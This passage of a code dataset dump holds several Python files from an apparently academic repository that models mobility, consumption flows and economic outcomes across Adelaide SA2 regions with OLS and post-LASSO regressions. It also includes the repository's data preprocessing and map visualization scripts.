= np.array(np.linspace(np.min(y), np.max(y), 100))\n pred_y_list = linear_visual_res.predict(sm.add_constant(y_list))\n ax.plot(y_list, pred_y_list, linewidth = 2, color = 'r')\n\n ax.set_xlabel(\"Observed\", fontsize = 12)\n ax.set_ylabel(\"Predicted\", fontsize = 12)\n ax.set_xlim(np.min(y_list) - .2* np.std(y_list), np.max(y_list) + .2* np.std(y_list))\n ax.set_ylim(np.min(pred_y) - .2* np.std(pred_y), np.max(pred_y) + .2* np.std(pred_y))\n ax.set_title(picture_title, fontsize = 15)\n ax.annotate(\"R2 = \"+str(np.round(model.rsquared, 2)), xy=(.25, .8), xycoords='figure fraction', fontsize = 20)\n plt.tight_layout()\n fig.savefig(save_path+fig_name+\".png\")\n plt.close()\n\n\ndef latex_table(all_vars, models):\n # inputs:\n # a full list of all the variables\n # a list of statsmodel output models.\n # outputs:\n # a latex table form.\n\n # create a base table for latex outputs\n errors = []\n for elt in all_vars:\n e = elt + \"_err\"\n errors.append(e)\n temp = []\n for i in range(len(all_vars)):\n temp.append(all_vars[i])\n if all_vars[i] not in {'Observations', 'R_squared', 'Adjusted_R_squared'}:\n temp.append(errors[i])\n\n table1 = pd.DataFrame(columns=temp)\n\n # create\n for variables, data, model in models:\n dict = {}\n for i, elt in enumerate(all_vars):\n if elt in model.params:\n i = list(model.params.keys()).index(elt)\n pval = model.pvalues[i]\n tag = \"\"\n if pval < 0.001:\n tag = \"***\"\n elif pval < 0.01:\n tag = \"**\"\n elif pval < 0.05:\n tag = \"*\"\n dict[elt] = str(round(model.params[elt], 3)) + tag\n dict[elt + \"_err\"] = \"(\" + str(round(model.bse[elt], 3)) + \")\"\n else:\n dict[elt] = \"\"\n if elt not in {'Observations', 'R_squared', 'Adjusted_R_squared'}:\n dict[elt + \"_err\"] = \"\"\n dict[\"Observations\"] = model.nobs\n dict[\"R_squared\"] = round(model.rsquared, 3)\n dict[\"Adjusted_R_squared\"] = round(model.rsquared_adj, 3)\n i = list(model.params.keys()).index(\"const\")\n pval = model.pvalues[i]\n tag = \"\"\n if pval < 0.001:\n tag = \"***\"\n elif pval < 0.01:\n tag = \"**\"\n elif pval < 0.05:\n tag = \"*\"\n dict[\"Constant\"] = str(round(model.params[\"const\"], 3)) + tag\n dict[\"Constant_err\"] = \"(\" + str(round(model.bse[\"const\"], 3)) + \")\"\n\n table1 = table1.append(dict, ignore_index=True)\n return table1\n\n\ndef post_lasso_estimate(y_name, x_attribute_names, alpha_value, df):\n '''\n :param y_name: name of output y\n :param x_attribute_names: a list of input x\n :param alpha_value: alpha value used for LASSO\n :param df: full dataframe\n :return: returns the input X and trained model\n '''\n y = np.log(df[y_name])\n X = np.log(df[x_attribute_names])\n X = sm.add_constant(X)\n mod = linear_model.Lasso(alpha=alpha_value) # 0.05.\n mod.fit(X, y)\n\n # choose only the sparse coefficients\n coeff_mask = np.abs(mod.coef_) > 0.00001\n coeff_mask = coeff_mask[1:] # remove the first const\n x_attribute_names_sparse = x_attribute_names[coeff_mask]\n\n # choos\n y = np.log(df[y_name])\n X = np.log(df[x_attribute_names_sparse])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n\n return X, x_attribute_names_sparse, res\n\n\ndef compute_econ_opportunity(metric_name, target_var_name, time_var_name, edge_df, attraction_param, friction_param, o_or_d):\n '''\n :param edge_df: edge data frame\n :param time_var_name: name of the travel duration variable\n :param target_var_name: resource variable\n :return: a dataframe with econ opportunity measure and SA2 idx\n '''\n if o_or_d == 'O':\n sa2_list = np.unique(edge_df['O'])\n elif o_or_d == 'D':\n sa2_list = np.unique(edge_df['D'])\n\n metric_list = []\n for sa2_idx in sa2_list:\n edge_df_sa2_specific = edge_df.loc[edge_df[o_or_d]==sa2_idx, :]\n metric=np.sum(edge_df_sa2_specific[target_var_name]**np.abs(attraction_param) / edge_df_sa2_specific[time_var_name]**np.abs(friction_param))\n metric_list.append(metric)\n\n #\n metric_df = pd.DataFrame({'sa2_code':sa2_list,\n metric_name:metric_list})\n return metric_df\n\n\ndef gini(x):\n # (Warning: This is a concise implementation, but it is O(n**2)\n # in time and memory, where n = len(x). *Don't* pass in huge\n # samples!)\n\n # Mean absolute difference\n mad = np.abs(np.subtract.outer(x, x)).mean()\n # Relative mean absolute difference\n rmad = mad/np.mean(x)\n # Gini coefficient\n g = 0.5 * rmad\n return g\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7286005616188049,
"alphanum_fraction": 0.7353940010070801,
"avg_line_length": 38.486488342285156,
"blob_id": "66fc07fe6ef34097958baef21f0fa47e73bfcab4",
"content_id": "1fec89f38809cc995ddf2b2bffac4c4fa8eabcef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2944,
"license_type": "permissive",
"max_line_length": 138,
"num_lines": 74,
"path": "/src/d06_visualization/visualize_accessibility.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# visualize the status quo accessibility metrics.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read files\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(model_output_path+'edge_df_policy_simulation.pickle', 'rb') as f:\n edge_df_policy_simulation = pickle.load(f)\n\nwith open(model_output_path+'node_df_policy_simulation.pickle', 'rb') as f:\n node_df_policy_simulation = pickle.load(f)\n\n#\nnode_shp = node_shp.merge(node_df_policy_simulation[['SA2_MAIN16','pop_based_consumption_opportunity','job_based_consumption_opportunity',\n 'amenity_based_consumption_opportunity','diversity_based_consumption_opportunity']],\n on=['SA2_MAIN16'],how='inner')\n\n# reload node_shp for the visualization function\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp_complete = pickle.load(f)\n\n\n# plot the accessibility metrics\ncolumn_name = 'pop_based_consumption_opportunity'\ntitle_name = 'Population-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'pop_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'job_based_consumption_opportunity'\ntitle_name = 'Job-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'job_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'amenity_based_consumption_opportunity'\ntitle_name = 'Amenity-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'amenity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\ncolumn_name = 'diversity_based_consumption_opportunity'\ntitle_name = 'Diversity-based consumption opportunities'\nsave_path = report_path+'accessibility_metrics/'\nfig_name = 'diversity_based_consumption_opp'\nutil.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path, node_shp_complete)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6483213901519775,
"alphanum_fraction": 0.6538249850273132,
"avg_line_length": 48.84403610229492,
"blob_id": "b003a54bea6c01627e31bfa28d040ebb3099f617",
"content_id": "fa829895b5e215e4a50bb820f8e6219f0b8f4656",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5451,
"license_type": "permissive",
"max_line_length": 138,
"num_lines": 109,
"path": "/src/d06_visualization/visualize_socioecon.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# visualization\n# type 1. Visualize the nodes' attributes (sociodemographics, etc.)\n# type 2. Visualize the edges' attributes (flows, etc.)\n# type 3. Visualize the edges' attributes in a sparse manner (flows, etc.)\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nimport copy\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f) # more observations\n\nwith open(processing_data_path+'node_shp.pickle', 'rb') as f:\n node_shp = pickle.load(f)\n\nwith open(processing_data_path+'edge_shp.pickle', 'rb') as f:\n edge_shp = pickle.load(f)\n\n# visualize node_shp\nplot_dic = [('total_pop', 'Total population', 'node_socioecon_total_pop'),\n ('pop_density', 'Population density', 'node_socioecon_pop_density'),\n ('tot_num_jobs_000', 'Total jobs', 'node_socioecon_total_jobs'),\n ('median_income_per_job_aud_persons', 'Median income', 'node_socioecon_median_income'),\n ('master_degree_percent', 'Percent of master degree', 'node_socioecon_percent_master'),\n ('poi_count', 'Counts of POIs', 'node_poi_count'),\n ('poi_count_agg', 'Counts of aggregated POIs', 'node_poi_count_agg'),\n ('poi_entropy', 'Entropy of POIs', 'node_poi_entropy'),\n ('poi_entropy_agg', 'Entropy of aggregated POIs', 'node_poi_entropy_agg'),\n ('poi_count_density', 'Count density of POIs', 'node_poi_count_density'),\n ('poi_count_agg_density', 'Count density of aggregated POIs', 'node_poi_count_agg_density'),\n ('poi_entropy_density', 'Entropy density of POIs', 'node_poi_entropy_density'),\n ('poi_entropy_agg_density', 'Entropy density of aggregated POIs', 'node_poi_entropy_agg_density'),\n ('class_HWY', 'Number of highways', 'node_road_class_HWY'),\n ('num_nodes', 'Number of road intersections', 'node_road_num_nodes'),\n ('num_4degree', 'Number of 4-way intersections', 'node_road_num_4degree'),\n ('flow_agents_o', 'Agent flow (origin aggregated)', 'node_flow_agents_o'),\n ('flow_agents_d', 'Agent flow (destination aggregated)', 'node_flow_agents_d'),\n ('consumption_amount_age_source_o', 'Consumption flow (origin aggregated)', 'node_flow_consumption_amount_age_source_o'),\n ('consumption_amount_age_source_d', 'Consumption flow (destination aggregated)', 'node_flow_consumption_amount_age_source_d')]\n\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n fig_name = each_plot[2]\n save_path = report_path+'node_visual/'\n util.plot_sa2_node_attributes(node_shp, column_name, title_name, fig_name, save_path)\n\n\n# visualize edge_shp\nplot_dic = [('flow_agents', 'Flow of unique agents', 'edge_flow_agents'),\n ('flow_duration', 'Flow of agents duration', 'edge_flow_duration'),\n ('flow_stays', 'Flow of agents stay', 'edge_flow_stays'),\n ('consumption_count_age_source', 'Consumption counts (age source)', 'edge_consumption_count_age_source'),\n ('consumption_amount_age_source', 'Consumption amount (age source)', 'edge_consumption_amount_age_source'),\n ('consumption_count_mcc_source', 'Consumption counts (mcc source)', 'edge_consumption_count_mcc_source'),\n ('consumption_amount_mcc_source', 'Consumption amount (mcc source)', 'edge_consumption_amount_mcc_source'),\n ('od_duration', 'OD duration', 'edge_od_duration'),\n ('class_HWY', 'Highway connectivity', 'edge_class_HWY'),\n ('class_LOCL', 'Local way connectivity', 'edge_class_LOCL'),\n ('num_nodes', 'Number of nodes', 'edge_num_nodes'),\n ('num_4degree', 'Number of 4-way intersections', 'edge_num_4degree')]\n\n# drop the self loops\nedge_shp = edge_shp.loc[edge_shp['O'] != edge_shp['D'], :]\n\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n fig_name = each_plot[2]\n save_path = report_path+'edge_visual/'\n util.plot_sa2_edge_attributes(edge_shp, node_shp, column_name, title_name, fig_name, save_path)\n\n# visualize sparse edge plots for the three flow attributes\n# plot_dic = [('flow_agents', 'Flow of unique agents', 'edge_flow_agents_sparse'),\n# ('flow_duration', 'Flow of agents duration', 'edge_flow_duration_sparse'),\n# ('flow_stays', 'Flow of agents stay', 'edge_flow_stays_sparse')]\n\n# visualize sparse\nfor each_plot in plot_dic:\n column_name = each_plot[0]\n title_name = each_plot[1]\n fig_name = each_plot[2]+'_sparse'\n save_path = report_path+'edge_visual/'\n edge_shp_sparse = edge_shp.loc[edge_shp[column_name] > np.mean(edge_shp[column_name])+np.std(edge_shp[column_name]), :]\n util.plot_sa2_edge_attributes(edge_shp_sparse, node_shp, column_name, title_name, fig_name, save_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6672582030296326,
"alphanum_fraction": 0.6779059171676636,
"avg_line_length": 28.552631378173828,
"blob_id": "fb422f08a4c436aaf22c6a8b2782b8ca56d022b5",
"content_id": "5446f3a14b41ddb72c3f1d7d585363f1ee3d11b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1127,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 38,
"path": "/src/d02_intermediate/preprocess_4_travel_time.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n\n# read files\nwith open(raw_data_path+\"OD_Google_API_raw.pickle\", 'rb') as w:\n OD_time_raw=pickle.load(w)\n\nwith open(raw_data_path+\"OD_Google_API_With_Map_Info.pickle\", 'rb') as w:\n OD_time_SA2=pickle.load(w)\n\n# rename\nOD_time_SA2.rename(columns={'o_sa2_idx':'O',\n 'd_sa2_idx':'D',\n 'od_duration_value':'od_duration',\n 'od_distance_value':'od_distance'}, inplace=True)\n\n# save\nOD_time_SA2[['O','D','od_duration','od_distance']].to_pickle(intermediate_data_path+'sa2_edge_travel_time.pickle')\n\n\n\n\n"
},
{
"alpha_fraction": 0.5608828663825989,
"alphanum_fraction": 0.5672193765640259,
"avg_line_length": 40.62995529174805,
"blob_id": "f484f83a1c933f2629664222e652ba7bc452b636",
"content_id": "f17525e1a9cbb351a230cac04b49caeb93ef89e6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9469,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 227,
"path": "/src/d04_modelling/train_models.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# three models to be trained.\n# 1. travel time ~ travel distance + road attributes. [edge df]\n# 2. mobility or consumption flow ~ origin attributes + destination attributes + travel time [edge df]\n# 3. income ~ mobility flow + controls [node df]\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f) # more observations\n\n# function\n\n###########################################################################################\n# model 1. infrastructure efficiency.\n###########################################################################################\ny_name = 'od_duration'\nmodel_dic = {'Model 1': (y_name, ['od_distance']),\n 'Model 2': (y_name, ['od_distance', 'num_roads', 'num_nodes']),\n 'Model 3': (y_name, ['od_distance', 'num_roads', 'class_HWY', 'num_nodes', 'num_1degree'])}\nedge_df = edge_flow_df\nmodel_list = []\nall_variables = ['Constant', 'od_distance', 'num_roads', 'class_HWY', 'num_nodes', 'num_1degree']\n\nfor model_idx in model_dic.keys():\n y_name, x_name = model_dic[model_idx]\n y = np.log(edge_df[y_name])\n X = np.log(edge_df[x_name])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append((model_idx, model_dic[model_idx], res))\n\n# export the regression tables as latex\nlatex_table_results = util.latex_table(all_variables, model_list)\nlatex_table_results.index = model_dic.keys()\nprint(latex_table_results.T)\n\n# save\nwith open(model_path+'model1_list_'+y_name+'.pickle', 'wb') as f:\n pickle.dump(model_list, f)\nwith open(model_output_path+'model1_table_'+y_name+'.txt', 'w') as f:\n f.writelines(latex_table_results.T.to_latex())\n\n\n\n###########################################################################################\n# model 2. human dynamics.\n###########################################################################################\npd.set_option('display.max_columns', None) # change default columns to max.\n\n# y_name = 'flow_agents'\n# edge_df = edge_flow_df\n# alpha_value = 0.08\n\ny_name = 'consumption_count_mcc_source'\nedge_df = edge_consumption_df\nalpha_value = 0.03\n\n# y_name = 'consumption_amount_mcc_source'\n# edge_df = edge_consumption_df\n# alpha_value = 0.02\n\nmodel_dic = {'Model 1': (y_name, ['od_duration']),\n 'Model 2': (y_name, ['od_duration', 'pop_density_o', 'pop_density_d']),\n 'Model 3': (y_name, ['od_duration', 'job_density_1_o', 'job_density_1_d']),\n 'Model 4': (y_name, ['od_duration', 'poi_count_agg_density_o', 'poi_count_agg_density_d']),\n 'Model 5': (y_name, ['od_duration', 'poi_entropy_agg_density_o', 'poi_entropy_agg_density_d'])}\nmodel_list = []\nall_variables = ['Constant', 'od_duration', 'pop_density_o', 'pop_density_d', 'job_density_1_o', 'job_density_1_d',\n 'poi_count_agg_density_o', 'poi_count_agg_density_d', 'poi_entropy_agg_density_o', 'poi_entropy_agg_density_d']\n\n# Train the first five models\nfor model_idx in model_dic.keys():\n y_name, x_name = model_dic[model_idx]\n y = np.log(edge_df[y_name])\n X = np.log(edge_df[x_name])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append((model_idx, model_dic[model_idx], res))\n\n# Train the last model\nx_attribute_names = np.array(['od_duration',\n 'poi_count_agg_density_o', 'poi_count_agg_density_d',\n 'poi_entropy_density_o', 'poi_entropy_density_d',\n 'poi_entropy_agg_density_o', 'poi_entropy_agg_density_d',\n 'pop_density_o', 'pop_density_d',\n 'job_density_1_o', 'job_density_1_d'\n ])\n\n# train the post lasso model\nX, x_attribute_names_sparse, res = util.post_lasso_estimate(y_name, x_attribute_names, alpha_value, edge_df)\nmodel_list.append(('Post LASSO', (y_name, x_attribute_names_sparse), res))\n\n# latex outputs\nlatex_table_results = util.latex_table(all_variables, model_list)\nlatex_table_results.index = list(model_dic.keys()) + ['Post LASSO']\nprint(latex_table_results.T)\n# latex_table_results.T.to_latex()\n\n# save\nwith open(model_path+'model2_list_'+ y_name +'.pickle', 'wb') as f:\n pickle.dump(model_list, f)\nwith open(model_output_path+'model2_table_'+ y_name +'.txt', 'w') as f:\n f.writelines(latex_table_results.T.to_latex())\n\n\n\n###########################################################################################\n# model 3. economic outcomes\n###########################################################################################\n# all potential ys: median_income_per_job_aud_persons, unemployment_rate, poverty_rate_1, poverty_rate_2, median_inc, gini.\ny_name = 'median_income_per_job_aud_persons'\n# y_name = 'num_jobs_000_persons'\nalpha_value = 0.01\n\nmodel_dic = {'Model 1': (y_name, ['flow_agents_o', 'flow_agents_d']),\n 'Model 2': (y_name, ['consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d']),\n 'Model 3': (y_name, ['consumption_count_mcc_source_o', 'consumption_count_mcc_source_d']),\n 'Model 4': (y_name, ['flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d'\n ]),\n 'Model 5': (y_name, ['flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d',\n 'total_pop','avg_age', 'male_percent', 'bachelor_degree_percent', 'master_degree_percent'\n ])}\nmodel_list = []\nall_variables = ['Constant', 'flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d',\n 'total_pop','avg_age', 'male_percent', 'bachelor_degree_percent', 'master_degree_percent']\n\n# Train the first five models\nfor model_idx in model_dic.keys():\n y_name, x_name = model_dic[model_idx]\n y = np.log(node_df[y_name])\n X = np.log(node_df[x_name])\n X = sm.add_constant(X)\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append((model_idx, model_dic[model_idx], res))\n\n# Train the last model\nx_attribute_names = np.array(['flow_agents_o', 'flow_agents_d',\n 'consumption_amount_mcc_source_o', 'consumption_amount_mcc_source_d',\n 'consumption_count_mcc_source_o', 'consumption_count_mcc_source_d',\n 'total_pop','avg_age', 'male_percent', 'bachelor_degree_percent', 'master_degree_percent'\n ]) # or pop_density?\n\n# train the post lasso model\nX, x_attribute_names_sparse, res = util.post_lasso_estimate(y_name, x_attribute_names, alpha_value, node_df)\nmodel_list.append(('Post LASSO', (y_name, x_attribute_names_sparse), res))\n\n# latex outputs\nlatex_table_results = util.latex_table(all_variables, model_list)\nlatex_table_results.index = list(model_dic.keys()) + ['Post LASSO']\nprint(latex_table_results.T)\n\n# save\nwith open(model_path+'model3_list_'+ y_name +'.pickle', 'wb') as f:\n pickle.dump(model_list, f)\nwith open(model_output_path+'model3_table_'+ y_name +'.txt', 'w') as f:\n f.writelines(latex_table_results.T.to_latex())\n\n\n###########################################################################################\n# model 4. Scaling diagnosis\n###########################################################################################\nX = np.log(node_df['pop_density'])\ny_list = ['median_income_per_job_aud_persons',\n 'flow_agents_o',\n 'flow_agents_d',\n 'consumption_count_mcc_source_o',\n 'consumption_count_mcc_source_d',\n 'consumption_amount_mcc_source_o',\n 'consumption_amount_mcc_source_d',\n 'poi_count_agg',\n 'poi_count_agg_density',\n 'poi_entropy_agg',\n 'poi_entropy_agg_density',\n 'num_roads',\n 'num_nodes'\n ]\n\nmodel_list = []\n\n# param_dic = {}\nfor y_name in y_list:\n # print(y_name)\n y = np.log(node_df[y_name])\n mod = sm.OLS(y, X)\n res = mod.fit()\n model_list.append(('_', (y_name, 'pop_density'), res))\n\nwith open(model_path+'model4_list_scaling_''.pickle', 'wb') as f:\n pickle.dump(model_list, f)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6847946643829346,
"alphanum_fraction": 0.702774703502655,
"avg_line_length": 51.78823471069336,
"blob_id": "d9c06209dd8aaeede5b4052e39c5428a76be8c32",
"content_id": "57e171c51ca462139e0acafcbeb2c36f6098296d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4505,
"license_type": "permissive",
"max_line_length": 147,
"num_lines": 85,
"path": "/src/d02_intermediate/preprocess_3_network_flow.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# process the network flow data\n# three inputs: mobility flow, transaction flow with age bins, and transaction flow with activity bins\n# outputs: sa2_edge_flow - network edges with flow and transaction data\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# data path\n# sw: define the path based on the root project directory.\nraw_data_path = os.path.join(os.getcwd(),'data/01_raw/')\nintermediate_data_path = os.path.join(os.getcwd(),'data/02_intermediate/')\n\n# mount_path = \"/Users/shenhaowang/Dropbox (MIT)/project_econ_opportunity_south_Australia\"\n\n# read files\nflow_df = pd.read_csv(raw_data_path + \"flows_sa2_months_2018-02-01.csv\")\ntrans_age_df = pd.read_csv(raw_data_path + \"transaction_age_bins.csv\")\ntrans_mcc_df = pd.read_csv(raw_data_path + \"transaction_mcc.csv\")\nsa2_adelaide_edge = gpd.read_file(intermediate_data_path+'shapefiles/sa2_adelaide_edge.shp')\n\n# Change sa2 values to string\nflow_df['sa2'] = flow_df.sa2.astype(str)\nflow_df['agent_home_sa2'] = [x[:-2] for x in flow_df['agent_home_sa2'].astype(str)]\ntrans_age_df['source_sa2'] = trans_age_df['source_sa2'].astype(str)\ntrans_age_df['target_sa2'] = trans_age_df['target_sa2'].astype(str)\ntrans_mcc_df['source_sa2'] = trans_mcc_df['source_sa2'].astype(str)\ntrans_mcc_df['target_sa2'] = trans_mcc_df['target_sa2'].astype(str)\n\n# remove invalid values\ninvalid_value_list = ['Cell Size Limit', 'nan', 'OUTST']\ntrans_age_df=trans_age_df.loc[~trans_age_df.source_sa2.isin(invalid_value_list)]\ntrans_age_df=trans_age_df.loc[~trans_age_df.target_sa2.isin(invalid_value_list)]\ntrans_mcc_df=trans_mcc_df.loc[~trans_mcc_df.source_sa2.isin(invalid_value_list)]\ntrans_mcc_df=trans_mcc_df.loc[~trans_mcc_df.target_sa2.isin(invalid_value_list)]\n\n# choose only the adelaide area\nadelaide_sa4_set = ['401','402','403','404']\nflow_adelaide_df = flow_df.loc[np.array([x[:3] in adelaide_sa4_set for x in flow_df.agent_home_sa2])]\nflow_adelaide_df = flow_adelaide_df.loc[np.array([x[:3] in adelaide_sa4_set for x in flow_adelaide_df.sa2])]\ntrans_age_adelaide_df = trans_age_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_age_df.source_sa2])]\ntrans_age_adelaide_df = trans_age_adelaide_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_age_adelaide_df.target_sa2])]\ntrans_mcc_adelaide_df = trans_mcc_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_mcc_df.source_sa2])]\ntrans_mcc_adelaide_df = trans_mcc_adelaide_df.loc[np.array([x[:3] in adelaide_sa4_set for x in trans_mcc_adelaide_df.target_sa2])]\n\nprint(flow_adelaide_df.shape)\nprint(trans_age_adelaide_df.shape)\nprint(trans_mcc_adelaide_df.shape)\n\n# replace names and reindex\nflow_adelaide_df.rename(columns={'agent_home_sa2':'O',\n 'sa2':'D',\n 'unique_agents':'flow_agents',\n 'sum_stay_duration':'flow_duration',\n 'total_stays':'flow_stays'},inplace=True)\nflow_adelaide_df.reset_index(drop=True, inplace=True)\ntrans_age_adelaide_df.rename(columns={'source_sa2':'O','target_sa2':'D'},inplace=True)\ntrans_age_adelaide_df.reset_index(drop=True, inplace=True)\ntrans_mcc_adelaide_df.rename(columns={'source_sa2':'O','target_sa2':'D'},inplace=True)\ntrans_mcc_adelaide_df.reset_index(drop=True, inplace=True)\n\n# aggregate transaction data into OD pairs\ntrans_age_adelaide_agg_df=trans_age_adelaide_df.groupby(['O', 'D'],as_index=False).aggregate([\"sum\"]).reset_index()[['O','D','count','amount']]\ntrans_mcc_adelaide_agg_df=trans_mcc_adelaide_df.groupby(['O', 'D'],as_index=False).aggregate([\"sum\"]).reset_index()[['O','D','count','amount']]\ntrans_age_adelaide_agg_df.columns=['O','D','consumption_count_age_source','consumption_amount_age_source']\ntrans_mcc_adelaide_agg_df.columns=['O','D','consumption_count_mcc_source','consumption_amount_mcc_source']\n\n# merge files\nsa2_adelaide_edge_flow = sa2_adelaide_edge.merge(flow_adelaide_df[['O','D','flow_agents','flow_duration','flow_stays']], on=['O','D'], how='outer')\nsa2_adelaide_edge_flow = sa2_adelaide_edge_flow.merge(trans_age_adelaide_agg_df, on=['O','D'], how='outer')\nsa2_adelaide_edge_flow = sa2_adelaide_edge_flow.merge(trans_mcc_adelaide_agg_df, on=['O','D'], how='outer')\n\n# save\nsa2_adelaide_edge_flow.to_pickle(intermediate_data_path+'sa2_edge_flow.pickle')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6758086085319519,
"alphanum_fraction": 0.686562180519104,
"avg_line_length": 54.375,
"blob_id": "4e1cbb5a201a9eaa3bc31a046cf166b7245b9a4f",
"content_id": "3db26017012d49ef04ed02725031877aaed46d86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11996,
"license_type": "permissive",
"max_line_length": 177,
"num_lines": 216,
